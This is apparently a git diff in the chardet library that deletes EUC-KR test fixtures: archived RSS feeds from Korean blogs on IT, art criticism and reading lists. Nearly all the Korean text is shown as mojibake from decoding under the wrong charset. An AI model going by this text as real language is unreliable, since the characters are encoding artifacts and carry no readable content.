Guestµיµµ ±׳³ֹ ±ְ» ֶק½÷ֳֶַׂ ¼צ ְײµµ·ֿ ¼³ֱ₪ַ´ֲµ¥, ¾ֻ°ם÷¸´ֿ ֶק½÷ֳֶ½ֳ email ֱײ¼ׂ¸¦ ְװ·ֲַֿ´ֲ°װ °­ֱ¦ְ »חַ׳ְ¸·־... -http://alogblog.com/blog/archives/2004/10/YaBB_ֶק·³ְַ_email_¿ה±¸¸¦_URL·־_÷¯°ז.php -http://alogblog.com/blog/archives/2004/10/YaBB_ֶק·³ְַ_email_¿ה±¸¸¦_URL·־_÷¯°ז.php -IT -Fri, 29 Oct 2004 13:52:43 +0900 - - -ְֱּצ½÷(EGIS) ¼­÷ס½÷¸¦ ¿×ְ¸·־ ְּ¿כַׁ ¾ַ´צ »חְֶּ® ֳגַצ °¡´ֹ¼÷ - -http://alogblog.com/blog/archives/2004/10/ְֱּצ½÷EGIS_¼­÷ס½÷¸¦_¿×ְ¸·־_ְּ¿כַׁ_¾ַ´צ_»חְֶּ®_ֳגַצ_°¡´ֹ¼÷.php -http://alogblog.com/blog/archives/2004/10/ְֱּצ½÷EGIS_¼­÷ס½÷¸¦_¿×ְ¸·־_ְּ¿כַׁ_¾ַ´צ_»חְֶּ®_ֳגַצ_°¡´ֹ¼÷.php -IT -Fri, 29 Oct 2004 01:18:19 +0900 - - -ֱצֳַֿ¶ ÷ם·־±׳ -¿ל¿¬ָק ֱצֳַֿ¶ ÷ם·־±׳¶ף´ֲ ´¼ׂ ָ²´חַׁ ÷ם·ֿ ¼­÷ס½÷¸¦ ¹°ַ´.¿¹ְ¿¡ geourl.org ְּ¶ף´ֲ °ק¿¡¼­ ְ¼¼°טְְ¸·־ ְ§µµ/°זµµ(?) °×ְ¸·־ ÷ס½ֱַׁ ¼­÷ס½÷¸¦ ַ´ֲµ¥ ¿הֱע¿£ ¸®³כ÷£ְּ¼ַַׁ´°ם ְב±ס ´ַפְײ´ֲµ¥, ְּ¿ֽ ÷ס½ֱַׁ ¾ְֶּµנ¾מ·־ ֱצֳַֿ¶ ¿×ְ» ÷־±ְ¸·־ ÷ם·ְֿ» ¹­´ֲ ¼­÷ס½÷¸¦ ַֿ´ֲ °קְּ¾ת´.ֱצֳַֿ¶ ¿×ְ» ¸ֵ°³·־ ַׁ ÷ם·ֿ³¢¸®ְַ ¿«ְ׃/¹­ְ׃ְּ ¾ף¸¶³× ַצ½ְְַ¸·־ ְ¯¿כַׂ±מ?... -http://alogblog.com/blog/archives/2004/10/ֱצֳַֿ¶_÷ם·־±׳.php -http://alogblog.com/blog/archives/2004/10/ֱצֳַֿ¶_÷ם·־±׳.php -IT -Mon, 25 Oct 2004 21:15:58 +0900 - - -÷ם·־±׳¿¡ ¸ְֱֿײ¼ׂ »נְװ½ֳ ¸מ°¡ֱצ ½÷ֶװ ¹זֱצֳ¥ -»ח½ַ ÷ם·־±׳¿¡ ְ½ְֵַ ¸ְֿ ֱײ¼ׂ¸¦ ְְ» ַ¿ה°¡ ְײ³×?.......±׳¸® ַ¼צְְ־ ¿ה±¸´ֲ ¾ֶ´ֿ¶ף ÷¸ְֱּצ¸¸ ָ₪ ³ײ´ֲ °ז¿ל, ½÷ֶט·־÷¿ְַ ±׳¹°¸ֱ¿¡¼­ ¹‏¾מ³¯ ¼צ ְײ´ֲ ¹ז¹‎ְ¸·־ ַ¥½ֳַ״¾, ³×ֱ¿¡ ³¯¶ף¿ֱֳצ ¸נ¸£´ֲ ¹«ֱצ¸·ֱצַׁ ½÷ֶװ¸ְְֿ» ַַַׂ¼צ ְײְ» °ְּֽ´.°ב±¹ °¡´ַֹׁ ַׁ ְ½ְֵַ ¸ְֱֿײ¼ׂ¸¦ ·־÷¿ְּ ְ׀±ג ½¬¿מ ֲֵַ·־ ֱקֱ¢ »נְװַֿ´ֲ... -http://alogblog.com/blog/archives/2004/10/÷ם·־±׳¿¡_¸ְֱֿײ¼ׂ_»נְװ½ֳ_¸מ°¡ֱצ_½÷ֶװ_¹זֱצֳ¥.php -http://alogblog.com/blog/archives/2004/10/÷ם·־±׳¿¡_¸ְֱֿײ¼ׂ_»נְװ½ֳ_¸מ°¡ֱצ_½÷ֶװ_¹זֱצֳ¥.php -IT -Mon, 25 Oct 2004 15:03:17 +0900 - - -ֱַ·¹ְ׃¼ְֲ» ְּ¿כַׁ ÷ם·ֿ µנְְ־ְַ ְו´ֱ¡°ת °ם·ֱַׂ ֱ¡µי -÷ם·ֿ µנְְ־½ֳ ֱַ·¹ְ׃¼ֲ(frameset) ֲֵ±׳¸¦ ְּ¿כַ״ ±¸¼÷ַֿ°ם ½ְֽ÷ °ז¿ל°¡ ֵ©°װ µ־°¡ֱצ °ז¿ל·־ ³×´¶´.ֳ¹ֲ°´ֲ ְֿ¹ְְ¸·־ ¸נµח ֶהְֱּצ¿¡¼­ °רֵכְְ־ »חְּµו¹ ÷־÷׀ְַ ¸´÷ ³»¿כְ» ¸ֵ ֶהְֱּצ ·־µש½ֳ¸¶´ ¹÷¹ַ״¼­ ÷ׂ·¯µיְּ´ֲ ¿ְ¹צ·־µו¸¦ ְֱּ±ג ְ§ַ״ ¸´÷ ÷־÷׀ְ» °םֱ₪ ֱַ·¹ְ׃ֶהְֱּצ·־ ֳ³¸®ַֿ°םְ ַֿ´ֲ °ז¿ל.µֲׁ°´ֲ ֱײ·־ ¹ט°זְ½¾ְַּ³×, ֳ³ְ½ ÷ם·ֿ ¹ז¹®½ֳ... -http://alogblog.com/blog/archives/2004/10/ֱַ·¹ְ׃¼ְֲ»_ְּ¿כַׁ_÷ם·ֿ_µנְְ־ְַ_ְו´ֱ¡°ת_°ם·ֱַׂ_ֱ¡µי.php -http://alogblog.com/blog/archives/2004/10/ֱַ·¹ְ׃¼ְֲ»_ְּ¿כַׁ_÷ם·ֿ_µנְְ־ְַ_ְו´ֱ¡°ת_°ם·ֱַׂ_ֱ¡µי.php -MovableType -Sat, 23 Oct 2004 19:45:34 +0900 - - -99³ג µו¶ף¸¶ ֳ´כְַ ¸ְ־ֵ׳¸¶ Sugar ¸¦ ¾ֶ½ֳ³×¿ה? - -http://alogblog.com/blog/archives/2004/10/99³ג_µו¶ף¸¶_ֳ´כְַ_¸ְ־ֵ׳¸¶_Sugar_¸¦_¾ֶ½ֳ³×¿ה.php -http://alogblog.com/blog/archives/2004/10/99³ג_µו¶ף¸¶_ֳ´כְַ_¸ְ־ֵ׳¸¶_Sugar_¸¦_¾ֶ½ֳ³×¿ה.php -ְּ·± ְת·± -Sat, 23 Oct 2004 14:48:05 +0900 - - -»ךֵ¸ ¿¡½÷¸¶צ´ - Don't Let Me Be Misunderstood - -http://alogblog.com/blog/archives/2004/10/»ךֵ¸_¿¡½÷¸¶צ´_Dont_Let_Me_Be_Misunderstood.php -http://alogblog.com/blog/archives/2004/10/»ךֵ¸_¿¡½÷¸¶צ´_Dont_Let_Me_Be_Misunderstood.php -ְּ·± ְת·± -Sat, 23 Oct 2004 14:16:00 +0900 - - - - - \ No newline at end of file diff --git a/chardet/tests/EUC-KR/arts.egloos.com.xml b/chardet/tests/EUC-KR/arts.egloos.com.xml deleted file mode 100644 index 33e0156..0000000 --- a/chardet/tests/EUC-KR/arts.egloos.com.xml +++ /dev/null @@ -1,219 +0,0 @@ - - - - - arts - http://arts.egloos.com - ¹ּ¼ת°·ֳ ֱ₪÷¸¹׳ ְ½ְֳו »חֱר°ת ¿©ַא±ג - ko - Fri, 13 Feb 2004 05:36:34 GMT - - arts - http://pds.egloos.com/logo/1/200402/13/12/a0012312.jpg - http://arts.egloos.com - 80 - 107 - ¹ּ¼ת°·ֳ ֱ₪÷¸¹׳ ְ½ְֳו »חֱר°ת ¿©ַא±ג - - - <![CDATA[ ±ט¿כְ׃ 4ָ¸ְ '‎ּ' ¡ז±ג¾ןַֿ´ ]]> - http://arts.egloos.com/1121848 - -
    -


    -
    (-)rest (0)³מְּ +(‎ּ)
    -
    -
    -ְ°¡ ±ט¿כְ׃ְַ ְ¾קְ÷ °ת°ֵ¿ֽ ַצְח ¹ּ·¡¸¦ ְ¯±גְְ¸·־ ¿¬°ב½ֳֵ´ְ¸·־ ½ְֳµָ´. ְּ·¯ַׁ µ¶ֶ¯ַׁ °°ט ¼׃¿¡¼­ ´½ֳ ¡®ָ(‎ּ)¡¯¶ף´ֲ °רֵכְ ¸םֱ¦¸¦ ²ר¾מ³½´. ְּ·¯ַׁ ְ°¡ְַ ְְ¯·־¿מ »ף»ף·ְֲ÷ °´°ְ ½ֳ°£¼÷ְ» ֳ¿שַֿ¿© ָ®¿¬ָק ±¸÷׀ µֱַצ ¾´ֲ ֱצ±״ָק °³÷°ְְ־ ½ֳ°ר°£ְַ ¿¬ֳגְ» °¡´ִֹֹ ַׁ´.
    -
    -ְ־°£ְּ °¡ֱצ´ֲ ָ(‎ּ) ¶ף´ֲ »ףֲֵ¸¦ ַצְח¶ף´ֲ ½ֱֳ¡¿¡¼­ ¹‏¾מ³× »ץ·׃°װ ֱ₪ְַַֿ´ֲ ְ°¡ְַ ֱ¢±ְ÷ ֱצ±״ָק ֱײ°ְְ־ ְַּ״¿¡ ְַ°ֵַ״ ´¾חַֿ°װ ָ­¸י¿¡¼­ ³×ֵ¸³×°ם ְײ´. µֱצ, ±ז, ±גֲק, ֱ‎, ¿¬, ¹¶ק°³÷ס, ¶¥µ¸װ±ג µמ°ת °°ְּ °ת°ֵ ¡®ָ(‎ּ)¡¯ְַ »ףָ² ¼׃¿¡¼­ ֳ₪¿כµַ¾ת´ר ¿©·¯ ¸ֵ°³ֳ¼µיְַ ±גָ£ְ¿ה¼ׂ·־ ְ־ַ״ »ף´ח÷־÷׀ ֱק¼³ְְ־ µו·־ְ׳ְ ַ¥ַצְּ µמְוַֿ°ן ַׁ´. ְּ·־ ְ־ַ״ ְ°¡°¡ ¼±ֳֵַׁ ¼ְׂחְַ »ףֲ¡¼÷°ת ָ¸ָ­ְַ °ז°ט´ֲ ָחµי¸®°װ µַ°ם, °ת°ֵ°¡ ַצְח·־ ְְּµַ´ֲ ְ¯±גְ ½ֳ°£¼÷ְ» °®°װ µָ´. ֶַׁם ָ­¸י¿¡¼­ ±גָ£ְ ¿ה¼ׂ¸¦ ֱ¦¿ַׁ ´¸¥ ֱ¶ַַאְ§ְַ ָחְµיְ÷ ֱצ±״ָק ְ¿¬ַ»ףְ(ם»זװ¡ׂ) ְּ¶ף°ם ַׂ ¼צ ְײ´. ±גָ£ְ ַ»ףµיְּ ְ°¡°¡ ַצְחְַ ½ֱֳ¡¿¡¼­ ְּ¼÷ְְ¸·־ ±ג¾ןַ״³»´ֲ ְ¯³ג±גְַ 1ֲקְ ¿¬»ף¹°ְּ¶ף¸י ¿ל¿¬ְ ¿ה¼ׂ°¡ ֱצ¹טְְ־ ¹ט°זְ÷ ַאְ§ְַ ָחְְ» ֵכַ״ ֳ¶ְתַֿ°װ ְחַצµֱַצ ¸רַֿ´ֲ ±׳ ¹«¾ש¿¡ ´כַׁ ¸·¿¬ַׁ ÷׳ֱתְּ¸ח ַצְח¶ף´ֲ ½ֱֳ¡¿¡¼­ ±׳°¡ ֱ¢±ַֿ°םְַֿ´ֲ °¡ְו ֶםַׁ »ףְֲֵַ ָ(‎ּ)ְ »ףְֲֵ־ °ְּֽ´.
    -
    -ְ°¡´ֲ ְַµµְְ¸·־ °ת°ֵ ³מְְַּ °³³ה¿¡¼­ ֱ¢ַ´ר ¿©·¯ ¼ְׂח¸¦ ¹ְּ °´°¼÷ְּ °³ְװ µֱַצ ¾ְ÷ ¾מ¼צ·טַׁ ַ»ףµי·־ ַ¥ַצַׁ´. ָ­¸י¿¡ ³×ֵ¸³­ ֳא¾אְ µו·־ְ׳ְ÷ ¸¶ִ¡ °ת°ֵ¿¡ ְ½ְֵּ ֱס°ו´ר ³מְֳּ³·³ °³±¸ ֲ¢±גµµ ַֿ´. °ת°ֵ¿¡ ¼±ֳֵַֿ°ם ֱס°ו´ר ֱצ±״ָק ְ¿¬½÷·¯¿מ ְ¯³ג±גְַ ְ»‎ְ(ם»זמ) ָ(‎ּ)¸¦ ´ץµכ¾מ ַצְחְַ ָ­¸י¿¡ °ֳ¶½ֳֵ°°ם ְײ´ֲ °ְּֽ´. ¶ַַׁ ֱצ±ְַ ְּ·¯ַׁ ְח»‎ְ(מ±זמ) ְ¾קַאְ§´ֲ ְ¿¬½÷·´°װ ¡®ַצְחְַ ָ(‎ּ)¡¯·־ ´כ÷¯µַ°ם ֳ»ף¼÷°ת °ב÷־µַ¾מ ³×ֵ¸³­ ¾ֶ·ֳַׁ ±גָ£ְַ ְ°³¸¦ ֵכַ״ ְ°¡ ְ½ְֵ÷ ¹°·׀ °°´°ת ַװ²² ¡®¹ּ·¡ְַ ָ(‎ּ)¡¯¸¦ ±גָ¹ַֿ°םְ ַֿ´ֲ °ְּֽ´. ְּ´ֲ ¸¶ִ¡ °ת°ֵ¿¡ ´כַׁ ¸®¹ְּ¹תְַ ַא·ְִ» °¡´ִֹֹ ַׁ ֶק½÷ֶ®¸נ´ץ´ֱֿע ½ֳ´כ¿¡ µ־µו·¯ֱצ´ֲ ¸ֵ¸¾נ¾מְַ °³³ה°ת °°ְּ ¸ֵ¸ְַ ְ¿כְ÷ °ב±¹ ַֿ³×ְַ ´כ»ף¿¡ ³»ְחַׁ ÷»ֱתְּ ¾ֶ´ֿ¶ף ½ֳ°רְ» ֳ¿שַׁ °°ט¼÷ְ» ¹®ֱ¦ »ן´ֲµ¥¼­ ³×¿ֲ ¹»ףְ¸·־ µ¶ֱ¸ְְ־ °³הְ »ח°ם¿¡ ´כַׁ ְ־½ְִַ ¹טְח¿ֽ °°´°ם ַׂ ¼צ ְײ´. ְּ¹ר ְ¾קְַ ְֳ¼ְ ְ¾ק¿מ¿µְ» ÷¸¸י ¶ׁ·ַַׁ ¸סְְ¸·־÷־ֵֽ ְְ¯·־¿מ ³מְְַּ °³³ה - ָ(‎ּ)¿¡ ´כַׁ ַאְ§¿¡ ±׳ ְַ¹ּ¸¦ ¸¹ְּ ÷־¿©ַׁ´. ְ°¡°¡ ְַ״ֱײ´ֲ ְּ·¯ַׁ ָ(‎ּ)ְַ °³³הְ÷ ¿ל¸®°¡ µ¿³׳¾מ±ֽ ´ד÷­¶פְ» ֱצ³¯ ¶§ ¹«½ִֹ ÷®¿¡ ±°ם ֱצ³×°¡´ֲ ¾ֱֶײ ֶם¾ַָׁ ¼±±±גְַ ַאְ§ֳ³·³ ±׳³אְַ ¿רְֳ µו·־ְ׳ְ¾קְ÷ ¸סְ¼÷ְ» ¹טֱ¦ַׁ ַאְ§¿¡ ֱ‎°בµַ¸ח ±׳°£ְַ ¼³ִ¡ְ¾קְ» ֵכַ״ ְ°¡´ֲ ´כֱצְ§¿¡¼­ ַאַ״ֱ³´ר ¸¹ְ÷ ³מְְַּ ָחְµיְ» ´½ֳ± ְחַצַ״ ³»´ֲ ¹ז½ִµµ ֳכַֿ°ם ְײ´.
    -
    -±ט¿כְ׃ְַ ְ¾קְ÷ °ב°ת¿¡ ´כַׁ ְ־½ְִ ¹®ֱ¦÷¸´ ַאְ§·־¼­ְַ ¿¹¼תְּ¶ף°ם ַׂ ¼צ ְײ´. ָ­¸יְַ ÷׀ְַׂ¿ה¼ׂ°¡ ְִ© ±¸¼÷ְ ¸ֶ¶פ¿¡¼­ °ֲ µֹ ¼צ ְײְ¸³× ְ°¡´ֲ ְּ·¯ַׁ ÷׀ַׂ°תֱ₪¿¡¼­ °´°ְּµח ֱײ°ְְּ°ַ ÷¸ֶםְ ¹ּ(¸)¿¡ ´כַׁ ֱ¢± ÷¸´´ֲ °תֱ₪°ת ¼ר°£ְַ ַאְ§¿¡ ´כַׁ ¸סְ¼÷¿¡ ÷סְֱ» µ־°ם ְײ´. ְ°¡ְַ ְּ·¯ַׁ °זַגְ÷ ³×ְּ÷ך ¾ֶֶ®(Naive Art)¿ֽ ±׳ ¸ֶ¶פְ» °°ְּ ַׁ´°ם ÷¼ ¼צ ְײ´ֲµ¥ ¿©±ג¼­ ³×ְּ÷ך(Naive)¶ץ ¡®ְ»‎ְְ¸·־ ½ְµזַׁ¡¯ ְּ¶ץ ¶זְַ ¶ףֶ¾¾מ¿¡¼­ ִֶ»‎µָ ¸»·־, 20¼¼±ג µי¾מ ¹ּ¼ת¿¡¼­ ְוְ־ְ ֵ׳ֵ©´׀ְּ ±ךµיֱצ ¾ְ÷ ¼ר¼צַׁ ְַ°°זַגְ» ֱצִ×ַֿ±גµµ ַֿ´ֲµ¥, ¸» ±׳´כ·־ ¼ר¼צַׁ ÷»´ֹ ¹׳ ֱק°¨¿¡ ±גֳַ״ ±גֱ¸ְַ ְֵכְ, °´°ְ ַ¥ַצ±ג¹‎ְ» ¹«½ֳַֿ°ם ¾מ¸°¾ְְֶַּ ֳµֱרַׁ ½ֳ°¢¿¡¼­ ÷» °ֽ °°ְ÷ ´ֱ¶·׃°ם ¿ר½ְְֳ־ ַ¥ַצְּ ֶ¯ֲ¡ְְּ´. ְּ·¯ַׁ °זַגְ÷ ¸¶ֲש°¡ֱצ·־ ֱַ¸®¹ֶּ¼÷סֱע(primitivism)¿¡¼­ ְַµµְְ¸·־ ¹ּ°³ְ־ְּ³× ¹ּ¼קַׁ ¾מ¸°ְּ ¼״¾¾¸¦ ָה³»³¿ְ¸·־½ב ½ַַצ ÷ׂ°¡´ַֹׁ °ת°ֵ·־ְַ ¿ֿ÷®ַׁ ½ֳ°£ְ ַאְ§¿©ַאְ» ַֿ´ֲ °ֽ°ת °°´°ם ַׂ ¼צ ְײ´. ¿ְ´ֳ³¯ ְ°¡µיְַ ְְ¯·׃°ם ¼­ֵק ְ¯¾ְֶ ְּ¹ֱּצ´ֲ ¾ְֶּ·¯´ֳִַֿֿ°װµµ ¹®¸םְּ ¹´ַׂ¼צ·ֿ ְ¿¬ְַ ¿ר½ֳ¼÷°ת °ת°ְֵ ֱ¶ַַאְ§¿ֽ °·ֳµַ¾מ ±״ָק ±גָ£ְ ַ»ףְ» ¶ל¸ח ֱצ±µµ ¸¹ְ÷ ¿¹¼ת°¡µי¿¡°װ ְ¾קְַ µ¿±ג¸¦ ÷־¿©½ֳֵ°°ם ְײ´. ¾מֲ¼¸י ְ°¡ ±ט¿כְ׃ ¿×½ֳ °³÷°ְ ½ֳ°ר°£ְַ ְ¯±גְ ַ״¼®ְ» ֵכַֿ¿© ¡®ֱ¶ְַ(נד¡מ) ָ¸±ג÷»´ֹ(ֿ‎גׂצ)ְ» ֳ±¸ַֿ´ֱֲצ ¸נ¸¥´.
    -
    -¹» ַצ´כ»חָ¸¿¡¼­ ַׁ¹רֲכ ±׳ ְ¸®¿¡ ¸״ֳח µ¸¦ µ¹¾ֶ÷¼ ¼צ ְײ´ֲ ½ֳ°£ְ» °®±ה ½±ֱצ ¾´. ֱצ±ְַ ÷¸¥ »חָ¸ ¹®ָ­ְ ÷¯ָ­´ֲ ֶ¯ָק³× ְ°¡ְַ ¼¼´כ¿¡ ְײ¾מ °ת°ְֵַ ±אֱ₪ְ ָ¸»ףְ» ´ץ¿ם ÷ׂ·¯ְְֿ¸ֵ³ ¼צ ְײ´ֲ ½ֳ°£¿©ַאְַ ´כ»ףְֿ °ְּֽ´. °ת°ֵ·־÷־ְֵַֽ ¸נµח ¿ֿ÷®ַׁ ְחַצ°ת ְ¯ֳ´ֲ ¾מ¶°ַׁ °תַ׀¹®¸םµµ ¾ֱֶק±מֱצ °¡´ִֹֹ ֱַֿר ¸רַׁ´. ֱַֿצ¸¸ ±ט¿כְ׃ְ÷ ÷׀¸םָק ַצְח¶ף´ֲ ½ֱֳ¡¿¡¼­ ְ½ְֵַ ¡®°³÷°ְ ָ(‎ּ)¡¯ְַ ֱ₪ְַ¿¡ ´כַֿ¿© ְ¾קְּ¶ץ ַאְ§¸¦ ֵכַ״ ±ֽ°ב½ֳֵ°·ֱ´ֲ ½ֳµµ¸¦ ַֿ°ם ְײ´. ¶§·־´ֲ ¼±¸םַֿ°ם ¶§·־´ֲ ¾ֶ·ֳַװְ¸·־ ´°¡¿ְ´ֲ °ת°ֵ·־ְַ ½ֳ°£¿©ַאְ» ְ°¡´ֲ ´÷׀ָק °³ְ־ְְ־ ְּ¾±ג¿ֽ ַװ²² ֱײ°ְ ½ֳ°¢ְ¸·־ ַ״¼®ַװְ¸·־¼­ 21¼¼±ג ±׳ ¾מ¶² ֳײֳ·´ °תַ׀ְ ½ֳ¹ִ·¹ְּ¼ַ(simulation)÷¸´ ´ץ¿ם °­ַׁ °¨ָןְַ °³÷°ְ ¹«´כ¿¬ֳגְ» ²ַֿׂ°ם ְײ´ֲ °ְּֽ´.
    -
    -
    -±ט ֱ₪ ½ִ (´±¹´כַ׀±³ ¼­¾חָ­°ת ¿·¡±³¼צ)
    -
    -
    -
    -
    -
    -
    -
    -
    -
    -
    - 
    -
    -
    - 
    -
    -
    -


    -
    - 
    -
    -
    - 
    -
    -
    - 
    -
    -
    - 
    -
    -
    - 
    -
    -
    -
    -
    -
    -


    -
    - 
    -
    -
    -
    -

     

    - ]]> -
    - ¹ּ÷׀·ש - Sat, 10 Sep 2005 03:46:54 GMT -
    - - <![CDATA[ 05 ³ל»צ°ר°£מק--2 ]]> - http://arts.egloos.com/997228 - -

    -
    - ]]> -
    - ¹ּ÷׀·ש - Tue, 10 May 2005 00:44:44 GMT -
    - - <![CDATA[ µ¿½ֳ´כ¹ּ¼ת¿¬±¸ָ¸ [³ל»צ°ר°£]מק ]]> - http://arts.egloos.com/997011 - - -ְ־»חµ¿ ֵהֶקַֿ¿ל½÷ ; 2005³ג 5¿ש 18, ¼צ¿הְֿ ~ 5¿ש 24, ָ­¿הְֿ
    -
    -¿ְֲַ´׳; 5¿ש 13ְֿ (±¿הְֿ) ¿ְִָ 4 ½ֳ, ¼÷³²¿©¼÷¹®ָ­ָ¸°
    -
    -
    -

    -
    -

    -
    -
    -
    -
    -
    -
    - ]]> -
    - ¹ּ÷׀·ש - Mon, 9 May 2005 16:13:57 GMT -
    - - <![CDATA[ µ¶µµ»ח¶ְ ]]> - http://arts.egloos.com/978534 - - - ]]> - - ¹ּ÷׀·ש - Fri, 22 Apr 2005 20:42:36 GMT - - - <![CDATA[ ´ְַ 3 ]]> - http://arts.egloos.com/929295 - - -ְָּ­¿©´כ ֱ¶¼ׂ°ת µ¿ֳ¢¸נְ׃
    -
    -
    - ]]> -
    - ¹ּ÷׀·ש - Thu, 10 Mar 2005 00:42:34 GMT -
    - - <![CDATA[ ´ְַ 2 ]]> - http://arts.egloos.com/929291 - -
    - ]]> -
    - ¹ּ÷׀·ש - Thu, 10 Mar 2005 00:35:45 GMT -
    - - <![CDATA[ ´ְַ 1 ]]> - http://arts.egloos.com/929287 - -
    - ]]> -
    - ¹ּ÷׀·ש - Thu, 10 Mar 2005 00:32:56 GMT -
    - - <![CDATA[ ±ט¿¬±װמק - ³כָ­¶ 2 ]]> - http://arts.egloos.com/929129 - -
    - ]]> -
    - ¹ּ÷׀·ש - Wed, 9 Mar 2005 17:48:10 GMT -
    - - <![CDATA[ ±ט¿¬±װמק - ³כָ­¶ 1 ]]> - http://arts.egloos.com/929128 - - -ְ־»חµ¿ ³כָ­¶¿¡¼­ - 3¿ש9ְֿ~19ְֿ±מֱצ
    -
    -ֱֲ¶ ; http://amkorea.com/cgi-bin/amkorea/board/ttboard.cgi?act=read&db=seoul_rho&page=1&idx=28
    -
    -ָ­¸י ±¸ֱ¶¿ֽ »צ - ÷¯ָ­ְַ µ־ֳר¸י. ְ±ֱר¼· (¹ּ¼תֶע·׀°¡).
    -
    -³»°װ ְײ¾מ¼­ ±ט¿¬±װַֿ¸י ¶°¿ְ¸£´ֲ °ְֽ÷ ְ¿¬ְַ ְּ¹ֱּצ´. ַ®, ²ֹ, ¾¾¾ׁ, µ¢±¼, ¿­¸ֵ
    -µמµמְּ ֱײµָ ³»¿כְ» ְּ·י´. ±׳ְַ ±׳¸²ְ÷ ±׳·¡¼­ ְ¿¬°ת ÷ׂ°¡÷׀ְַ °°ט°¡ ְײְ¸ ...
    -
    -
    - ]]> -
    - ¹ּ÷׀·ש - Wed, 9 Mar 2005 17:47:07 GMT -
    - - <![CDATA[ ַׁ±¹ ֲֵ±¹ ַצ´כ¹ּ¼ת ±³·שְ 6 ]]> - http://arts.egloos.com/909152 - -
    - ]]> -
    - ¹ּ÷׀·ש - Sat, 19 Feb 2005 12:08:16 GMT -
    -
    -
    diff --git a/chardet/tests/EUC-KR/birder.egloos.com.xml b/chardet/tests/EUC-KR/birder.egloos.com.xml deleted file mode 100644 index 7fefb43..0000000 --- a/chardet/tests/EUC-KR/birder.egloos.com.xml +++ /dev/null @@ -1,301 +0,0 @@ - - - - - birder's of FREEDOM!! - http://birder.egloos.com - ¶°³¯ ֱ״÷ס°¡ µַ¾מ ְײ´ֲ »ח¶קְ÷ ¸¶ְ½ְּ ÷־ְ´ - ko - Tue, 17 Jun 2003 09:21:35 GMT - - birder's of FREEDOM!! - http://pds.egloos.com/logo/1/200306/17/02/a0000002.jpg - http://birder.egloos.com - 80 - 97 - ¶°³¯ ֱ״÷ס°¡ µַ¾מ ְײ´ֲ »ח¶קְ÷ ¸¶ְ½ְּ ÷־ְ´ - - - <![CDATA[ 2005³ג µ¶¼­·®........? ]]> - http://birder.egloos.com/1214595 - - 2004³ג µ¶¼­·®ְ÷? 15±ַ
    -
    -2005³ג ְ׀ְ÷ֳ¥ LIST
    -
    -0107 ְ־µא¾מ·±½÷
    -0208 ¹ּ¾ײ¿ֽ ·חְּ °¡ֱ· 45ְֿ°£ְַ ¾ֱֶַ¸®ִ« ¿©ַא
    -0327 ¸ְּµו ¹ְּ ֱ״ְֳּ
    -0620 ְֿ»ףְַ ָ²ָ¦
    -0620 ֵט ֵַַֽ½÷ְַ ¹ּ·¡¸¦ °ז¿µַֿ¶ף!
    -0705 ֶ®·»µו¸¦ ֳ¢ֱ¶ַֿ´ֲ ְ ְּ³כ÷£ְֵּֽ
    -0726 iCEO ½÷ֶ¼÷ך ְג½÷
    -0817 ¹ּ¿מ¿ְ¸®»ץ³¢ְַ ֳג±
    -0905 ְו¿ְ־°£ 1, 2
    -1011 ִטµµ³­¸¶ ַׁ±¹°זֱ¦
    -

    -10±ְַ» ְ׀¾ת±÷¿ה..... ¿ֳַ״µµ ¸מ ֶהְֱּצ ³ׁ±ג°ם ½׳¾ֶ ³ץְ÷ ֳ¥ְּ ´ץ ¸¹¾ֶ ֱ³±÷ ₪ּ.₪ּ'
    -
    -³»³ג¿£ 5±ְַ¸·־ ֱֱצ´ֲ ¾°ֱצ! ^^;
    -
    -¹÷ »‎°¢ְּ ¸¹¾ֶ¼­ ְּ·¸°װ µֶ´ֱֲצ... - ]]> -
    - ¹ּ÷׀·ש - Sat, 24 Dec 2005 12:05:03 GMT -
    - - <![CDATA[ ³» »‎¾ײ °¡ְו ¾ֶ¸§´¿מ ְֱֿײְֿ[2005.10.25] ]]> - http://birder.egloos.com/1162539 - -
    - ]]> -
    - Book & Movie - Wed, 26 Oct 2005 01:16:55 GMT -
    - - <![CDATA[ ַׁ±¹°זֱ¦ְַ ְ½¸נְּ·׀ ]]> - http://birder.egloos.com/1149313 - - ִטµµ³­¸¶ ַׁ±¹°זֱ¦
    -ְוֱַֿ״ ¿ ֱצְ½, ְֱּ¾ֲֵ ¿«ְ½ / ÷־ֵ°
    -
    -ֳ¹ֲ°, ¿ל¹°¾ָ °³±¸¸®½ִ °זֱ¦ֱצ½ִ.
    -µֲׁ°, ¼±ֱר±¹¿¡ ½ִ¹־ֱצָ­ µַ¾מ°¡´ֲ ַׁ±¹°זֱ¦.
    -¼ֲֲ°, ַׁ±¹°זֱ¦ְַ ְ½¸נְּ·׀ (ֱצ±ְַ ַׁ±¹°זֱ¦¸¦ ÷¸¾ְׂ» ¶§,ֱ₪¸» ְ½¸נְּ·׀!)
    -
    -³× ְ½ְֵַ »מ¿¡ ´כַׁ °¡ִ¡°ְ» ¹²ד³ץְ» ¸¸ֵ­ְַ ֳז°!(³×ְַ ֲ×ְ÷ ֱצ½ִ¿¡¼­)
    -
    -¸¹ְ÷ »‎°¢°ת »מְַ ְָ¯ֱ¡ְּ µֹ ¸¸ֵ­ְַ ֳ¥ְּ¶ף°ם »‎°¢ַױ´ֿ´.
    -
    -ֳז° ±׳ ְֳ¼ְװ´ֿ´... - ]]> -
    - Book & Movie - Tue, 11 Oct 2005 11:26:14 GMT -
    - - <![CDATA[ ֱצ½ִ°ת ֱ₪÷¸´ֲ ¾מ¶»°װ ´¸¥°¡ ]]> - http://birder.egloos.com/1134770 - - °£´ָק ¿ה¾אְַֿ¸י ֱ₪÷¸´ֲ ְַ¹ּ¸¦ ¼צ¿כַֿ´ֲ °¡ְו ֳײ¼ְַַׁׂ ְ־½ִ´ְ§ְּ°ם,
    -
    -ֱצ½ְִ÷ ְּ ֱ₪÷¸¿ֽ ֱ₪÷¸µי °£ְַ °°ט¶ף°ם ַׂ ¼צ ְײ´. ±׳·¸´¸י »ץ·־¿מ ֱצ½ְִַ
    -
    -»‎»ךְ÷ ¾מ¶»°װ °¡´ַֹׁ°¡? »ץ·־¿מ ֱצ½ְִ÷ ±גֱ¸ְַ ֱ₪÷¸¿ֽ ֱ₪÷¸µי °£ְַ °°ט¸¦
    -
    -»ץ·׃°װ ¸¸µי¾מ ³»´ֲ °ְֽ» ¶זַׁ´. ְּ°ְּֽ ¹·־ ֳ¢ְַ¼÷ְּ´. -p80
    -
    -
    -ֱ₪÷¸¿ֽ ֱצ½ְִַ °°ט¸¦ ֵכַ״ ¼³¸םְַֿ¸י ֳ¢ְַ¼÷ְּ¶ץ? -p82
